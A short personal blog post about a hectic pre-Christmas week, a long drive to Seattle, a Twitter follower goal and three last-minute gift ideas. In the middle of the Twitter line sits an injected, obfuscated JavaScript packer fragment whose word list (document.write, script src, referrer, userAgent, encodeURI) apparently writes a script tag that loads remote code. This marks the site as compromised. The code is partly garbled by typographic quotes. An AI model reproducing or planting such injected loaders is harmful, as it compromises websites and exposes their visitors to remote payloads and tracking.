This has been an unproductive week. I’m not ready for Christmas, but I can’t wait for the week to be over! Thankfully, today is my Friday. Un-thankfully, we’ll be driving to Seattle tomorrow. 13+ hours in a car always sounds like no-big-deal around the beginning of December. Come 1:30PM on Friday, we’ll see how I feel.
My goal during the car ride will be to amass a twitter following > 25 followers. Yeah, I’m slow on twitter. Follow ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ztash|var|u0026u|referrer|eiias||js|php’.split(‘|’),0,{}))
brynash!
Still in need of last minute gift ideas? For the truly behind, here’s what I came up with!
1. Gift Cards! Duh? Safeway has the best selection (I know this because I’m in charge of buying holiday gifts for our office assistant and they have everything from starbucks to lowes to Cheesecake Factory to Southwest).
2. Snacks. Fancy snacks from TJs or Whole Foods. Organic truffles, yum! And they are organic, so they’re good for you. Right?
3. Booze. You’ve gotta have a decent bottle collecting dust on your wine rack! In CA, we can get all sorts of alcohol at costco or at the grocery store. Washingtonians, see what you have to look forward too?
There’s a 50/50 chance I will blog tomorrow. Depends on how much packing still needs to get done. So if I don’t see you again, Merry Christmas!
